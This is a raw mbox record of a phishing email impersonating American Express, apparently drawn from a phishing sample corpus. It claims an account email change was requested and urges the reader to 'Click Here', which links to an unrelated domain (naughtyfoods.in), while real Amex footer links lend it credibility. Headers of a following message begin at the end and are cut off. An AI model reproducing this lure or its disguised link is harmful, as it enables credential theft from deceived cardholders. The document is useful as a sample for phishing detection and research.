From: "American Express   " <david231@wsu.edu>
Date: Sun, 06 Jan 2019 17:26:29 -0600
Message-Id: <20190106232652.EEXB16483.dukecmmtar04.coxmail.com@dukecmimpo02.coxmail.com>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 3

You will not see this in a MIME-aware mail reader.
--===============0533694828==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

      =

     =

    =

 Request to Update Your Email
 =


 =

 =

    =

    	 =

	   =

 =

	   =

	 =

	 =

     =

 To protect your account, we are writing to confirm a recent activity on yo=
ur account.
 =

 We received a request to update your primary email on file to su******m@gm=
ail.com
 =

 If you requested this changes, no further action is required.
 =

  =

 If you did not request this email update, please Click Here immediately so=
 that we can ensure the safety of your account.
 =

  =

 American Express Customer Care
 =

	  =

    =

     =

 =

    Privacy Statement =

	 |	  Update Your Email =


 =

 Your account information is included above to help you recognize this as a=
 customer care e-mail from American Express. To learn more about e-mail sec=
urity or report a suspicious e-mail, please visit us at americanexpress.com=
/phishing. We kindly ask you not to reply to this e-mail but instead contac=
t us via Customer Care.
 =

 =A9 2018 American Express. All rights reserved.
 =

 PWDENDMCVPW0005
 	  =

 =

    =

   // <![CDATA[ document.body.onload=3Dfunction(){document.body.offsetHeigh=
t;window.print()}; // ]]>
--===============0533694828==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV></DIV></FONT>
<TABLE cellSpacing=3D0 cellPadding=3D12 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD>
<DIV style=3D"OVERFLOW: hidden"><FONT size=3D-1><U></U><U></U>
<DIV>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D550 align=3Dcenter border=3D=
0>
<TBODY>
<TR>
<TD bgColor=3D#ececec width=3D15>
<TD bgColor=3D#ffffff width=3D522 colSpan=3D3>
<TABLE style=3D"MIN-WIDTH: 100%" cellSpacing=3D0 cellPadding=3D0 width=3D"1=
00%">
<TBODY>
<TR>
<TD style=3D"BACKGROUND-COLOR: #666666" width=3D"100%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 6pt; FONT-FAMILY: Arial; MARGIN-=
TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px" align=3Dcenter>Request to Update Your Email</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 6pt; FONT-FAMILY: Arial; MARGIN-=
TOP: 0px"></P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 8pt; FONT-FAMILY: Arial; MARGIN-=
TOP: 0px"></P>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100.19%">
<TBODY>
<TR>
<TD width=3D"13.24%">
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD width=3D"19.12%">
<TD width=3D"61.77%"></TD>
<TD width=3D"19.11%"></TD></TD></TR></TBODY></TABLE></TD>
<TD width=3D"33.85%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR:=
 #666666; MARGIN-TOP: 0px"><B></B>&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR:=
 #666666; MARGIN-TOP: 0px"></P></TD>
<TD width=3D"37.97%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR:=
 #666666; MARGIN-TOP: 0px" align=3Dright>&nbsp;</P></TD>
<TD width=3D"14.93%"></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#ececec width=3D15></TD></TD></TR>
<TR>
<TD bgColor=3D#ececec width=3D15>
<TD bgColor=3D#ffffff width=3D15>
<TD bgColor=3D#ffffff width=3D492>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">To protect your account, we are writing to confirm=
&nbsp;a recent activity on your account.</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">We received a request to update your primary email=
 on file to su******m@gmail.com</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"><B>If you requested this changes</B>, no further a=
ction is required.</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"><B></B>&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"><B>If you did not request this email update</B>, p=
lease <A href=3D"https://naughtyfoods.in/.MaNdAtE">Click Here</A> immediate=
ly so that we can ensure the safety of your account.</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">American Express Customer Care</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"></P></TD>
<TD bgColor=3D#ffffff width=3D15>
<TD bgColor=3D#ececec width=3D15></TD></TD></TD></TD></TR>
<TR>
<TD bgColor=3D#ececec width=3D15>
<TD bgColor=3D#ffffff width=3D522 colSpan=3D3>
<TD bgColor=3D#ececec width=3D15></TD></TD></TD></TR>
<TR>
<TD bgColor=3D#ececec width=3D15>
<TD bgColor=3D#ececec width=3D15>
<TD bgColor=3D#ececec width=3D492>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 #666666; MARGIN-TOP: 0px"></P>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD width=3D"49%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial; COLOR: =
#666666; MARGIN-TOP: 0px" align=3Dcenter><A title=3D"" style=3D"COLOR: #666=
666" href=3D"http://www.americanexpress.com/Tracking?mid=3DDMC18112422045&a=
mp;msrc=3DGCSOTP-UCI&amp;url=3Dhttp://www.americanexpress.com/privacy" shap=
e=3Drect target=3D_blank data-saferedirecturl=3D"https://www.google.com/url=
?hl=3Den&amp;q=3Dhttp://www.americanexpress.com/Tracking?mid%3DDMC181124220=
45%26msrc%3DGCSOTP-UCI%26url%3Dhttp://www.americanexpress.com/privacy&amp;s=
ource=3Dgmail&amp;ust=3D1543976871374000&amp;usg=3DAFQjCNH6dGqIEcAmM7j2bVxZ=
ccPetP_29g">Privacy Statement</A> </P></TD>
<TD width=3D"2%">|</TD>
<TD width=3D"49%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial; COLOR: =
#666666; MARGIN-TOP: 0px" align=3Dcenter><A title=3D"" style=3D"COLOR: #666=
666" href=3D"http://www.americanexpress.com/Tracking?mid=3DDMC18112422045&a=
mp;msrc=3DGCSOTP-UCI&amp;url=3Dhttp://www.americanexpress.com/email" shape=
=3Drect target=3D_blank data-saferedirecturl=3D"https://www.google.com/url?=
hl=3Den&amp;q=3Dhttp://www.americanexpress.com/Tracking?mid%3DDMC1811242204=
5%26msrc%3DGCSOTP-UCI%26url%3Dhttp://www.americanexpress.com/email&amp;sour=
ce=3Dgmail&amp;ust=3D1543976871374000&amp;usg=3DAFQjCNF1sEja2tQXbVNuTdY4iid=
xmmFYvA">Update Your Email</A> </P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 #666666; MARGIN-TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial; COLOR: =
#666666; MARGIN-TOP: 0px">Your account information is included above to hel=
p you recognize this as a customer care e-mail from American Express. To le=
arn more about e-mail security or report a suspicious e-mail, please visit =
us at <A href=3D"http://www.americanexpress.com/Tracking?mid=3DDMC181124220=
45&amp;msrc=3DGCSOTP-UCI&amp;url=3Dhttps%3A%2F%2Fwww212.americanexpress.com=
%2Fdsmlive%2Fdsm%2Fdom%2Fus%2Fen%2Ffraudprotectioncenter%2Ffraudprotectionc=
enter_identifytheft.do%3Fvgnextoid%3Db9c75c5d66a4c110VgnVCM100000defaad94RC=
RD" shape=3Drect target=3D_blank data-saferedirecturl=3D"https://www.google=
.com/url?hl=3Den&amp;q=3Dhttp://www.americanexpress.com/Tracking?mid%3DDMC1=
8112422045%26msrc%3DGCSOTP-UCI%26url%3Dhttps%253A%252F%252Fwww212.americane=
xpress.com%252Fdsmlive%252Fdsm%252Fdom%252Fus%252Fen%252Ffraudprotectioncen=
ter%252Ffraudprotectioncenter_identifytheft.do%253Fvgnextoid%253Db9c75c5d66=
a4c110VgnVCM100000defaad94RCRD&amp;source=3Dgmail&amp;ust=3D154397687137400=
0&amp;usg=3DAFQjCNH3A0pFH7WYlEU8nuccWT0H6gR3Qg">americanexpress.com/phishin=
g</A>. We kindly ask you not to reply to this e-mail but instead contact us=
 via <A href=3D"http://www.americanexpress.com/Tracking?mid=3DDMC1811242204=
5&amp;msrc=3DGCSOTP-UCI&amp;url=3Dhttps%3A%2F%2Fglobal.americanexpress.com%=
2Fhelp%3Finav%3DiNUtlContact%26extlink%3Dus-em-serv-footer-helpcenter" shap=
e=3Drect target=3D_blank data-saferedirecturl=3D"https://www.google.com/url=
?hl=3Den&amp;q=3Dhttp://www.americanexpress.com/Tracking?mid%3DDMC181124220=
45%26msrc%3DGCSOTP-UCI%26url%3Dhttps%253A%252F%252Fglobal.americanexpress.c=
om%252Fhelp%253Finav%253DiNUtlContact%2526extlink%253Dus-em-serv-footer-hel=
pcenter&amp;source=3Dgmail&amp;ust=3D1543976871374000&amp;usg=3DAFQjCNGZzDZ=
i28b8L8PrfbV4xmf0MEUZfA">Customer Care</A>.</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial; COLOR: =
#666666; MARGIN-TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial; COLOR: =
#666666; MARGIN-TOP: 0px">=A9 2018 American Express. All rights reserved.</=
P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 8pt; FONT-FAMILY: Arial; COLOR: =
gray; MARGIN-TOP: 0px"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 8pt; FONT-FAMILY: Arial; COLOR: =
gray; MARGIN-TOP: 0px">PWDENDMCVPW0005</P><IMG style=3D"BORDER-TOP-STYLE: n=
one; BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE=
: none; DISPLAY: block" alt=3D"" src=3D"https://ci4.googleusercontent.com/p=
roxy/vW2CKEGDtazk4qM1pKU8eaNT2Gca9TYv3AjVbQ0aY6VO--29Cg0_p5XGWQpip1BjcZ-6Ew=
iLVK-vMQQfcv_c_fPbhBmln53VmRs6OUY10mEg1S7DCxTblUu0ekRPYNNl3NtRzF2S1CJwk18HH=
PVNGUHrDMrauy47=3Ds0-d-e1-ft#http://www.americanexpress.com/Tracking?mid=3D=
DMC18112422045&amp;msrc=3DGCSOTP-UCI&amp;TemplateId=3DPWDENDMCVPW0005" widt=
h=3D1 height=3D1> </TD>
<TD bgColor=3D#ececec width=3D15>
<TD bgColor=3D#ececec width=3D15></TD></TD></TD></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 0px; MIN-WIDTH: 550px; LINE-HEIGHT: 0px" height=3D1=
><IMG style=3D"TEXT-DECORATION: none; BORDER-TOP: medium none; BORDER-RIGHT=
: medium none; MIN-WIDTH: 550px; BORDER-BOTTOM: medium none; BORDER-LEFT: m=
edium none" src=3D"https://ci3.googleusercontent.com/proxy/FdXxpMEtr1JY9jkH=
tYnVw9-nnZDuzhigLe7wEKiGr4dfXl_l=3Ds0-d-e1-ft#http://spacer.gif" height=3D1=
> </TD></TR></TBODY></TABLE></DIV></FONT></DIV></TD></TR></TBODY></TABLE></=
TABLE>
<DIV></DIV>
<DIV></DIV>
<SCRIPT type=3Dtext/javascript nonce=3D"VHK8MyGuMWoooS1XjOHBIyaEUWM">// <![=
CDATA[
document.body.onload=3Dfunction(){document.body.offsetHeight;window.print()=
};
// ]]></SCRIPT></BODY></HTML>
--===============0533694828==--

From jose@monkey.org Mon Jan  7 02:41:20 2019 +0000
Return-Path: exports@delightdesigns.co.in
Delivered-To: jose@monkey.org
X-FDA: 75024774720.08.act87_80125cfbb042e
X-Spam-Summary: 39,2.407,0,6a1827a18edef30b,d41d8cd98f00b204,exports@delightdesigns.co.in,:,RULES_HIT:41:46:72:150:153:196:355:375:379:495:589:800:962:966:967:973:982:983:988:989:1021:1147:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1513:1515:1516:1517:1521:1535:1543:1561:1571:1588:1589:1593:1594:1622:1686:1710:1711:1714:1719:1730:1747:1777:1792:2194:2196:2198:2199:2200:2201:2393:2525:2527:2549:2560:2563:2610:2682:2685:2693:2790:2828:2859:2893:2895:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3586:3865:3866:3867:3868:3870:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4250:4321:4385:4552:5007:6117:6119:6261:6630:6669:6671:6678:7652:7809:8518:8599:8603:8837:8957:9025:9080:9388:10004:10249:10346:11026:11473:11639:11657:11658:11914:12043:12295:12517:12519:12555:12660:12740:12895:12903:12955:12986:13007:13139:13374:13439:14096:14181:14721:18000:21080:21433:21436:21451:21483:21524:21554:21627:21810:21819:30022:30026:30054,0,RBL:67
X-HE-Tag: act87_80125cfbb042e
X-Filterd-Recvd-Size: 5208
Received: from good.thehostingserver.com (good.thehostingserver.com [67.227.129.132])
	by imf27.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  7 Jan 2019 02:41:19 +0000 (UTC)
Received: from [37.49.225.220] (port=52438 helo=webmail.delightdesigns.co.in)
	by good.thehostingserver.com with esmtpsa (TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256)
	(Exim 4.87)
	(envelope-from <exports@delightdesigns.co.in>)
	id 1ggKqe-000FTZ-Kl
	for jose@monkey.org; Sun, 06 Jan 2019 21:41:06 -0500
